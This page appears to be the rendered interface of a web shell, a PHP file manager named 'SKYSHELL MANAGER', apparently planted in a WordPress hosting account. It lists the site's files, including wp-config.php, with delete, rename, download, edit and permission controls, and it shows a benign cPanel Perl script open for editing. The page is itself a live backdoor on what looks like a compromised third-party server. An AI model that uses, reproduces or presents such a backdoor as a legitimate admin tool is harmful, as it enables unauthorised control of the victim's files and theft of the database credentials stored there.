📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home4
/
cvysxmmy
/
public_html
/
antenmills-justadd10-com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
3.38 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.nfd-backup
3.38 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.phpupgrader.21100a0f
2.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.phpupgrader.initial
2.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
217639.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cli.yml
0.03 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.33 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.81 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: edit_cpanelsync_exclude_list
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - scripts/edit_cpanelsync_exclude_list Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited use Getopt::Param; my $prm = Getopt::Param->new( { 'help_coderef' => \&help, } ); my $exclude_file = '/etc/cpanelsync.exclude'; help() if ( !$prm->list_params() || ( !$prm->exists_param('remove') && !$prm->exists_param('add') ) ); if ( $prm->exists_param('file') ) { $exclude_file = $prm->get_param('file'); if ( !$exclude_file ) { help(); } } if ( $prm->exists_param('remove') ) { my %rem; @rem{ $prm->get_param('remove') } = (); my $edit = 0; my $cont = ''; if ( open my $read_fh, '<', $exclude_file ) { while (<$read_fh>) { chomp; if ( exists $rem{$_} ) { $edit++; } else { $cont .= "$_\n"; } } close $read_fh; } if ($edit) { if ( open my $write_fh, '>', $exclude_file ) { print {$write_fh} $cont; close $write_fh; print "Files removed ($edit)\n" if -t STDIN; } else { print "Could not remove files: $!"; } } else { print "No files to remove.\n" if -t STDIN; } } if ( $prm->exists_param('add') ) { my %current; if ( open my $read_fh, '<', $exclude_file ) { while (<$read_fh>) { chomp; $current{$_} = ''; } close $read_fh; } my $add = ''; for my $file ( $prm->get_param('add') ) { $add .= "$file\n" if $file =~ m{^/} && !exists $current{$file}; } if ($add) { if ( open my $add_fh, '>>', $exclude_file ) { print {$add_fh} $add; close $add_fh; print "Files added\n" if -t STDIN; } else { print "Could not add files: $!"; } } else { print "No files to add.\n" if -t STDIN; } } sub help { print <<"END_HELP"; $0 [--help | --add=/full/path/to/file --remove=/full/path/to/otherfile --file=/path/to/cpanelsync_exclude_file (optional) ] You can specify zero or more of either --add or --remove Files are removed first then files are added. Files are added in the order specified. The "--file" option allows you to edit a specific cpanelsync.exclude file rather than the global one. END_HELP exit; }
Save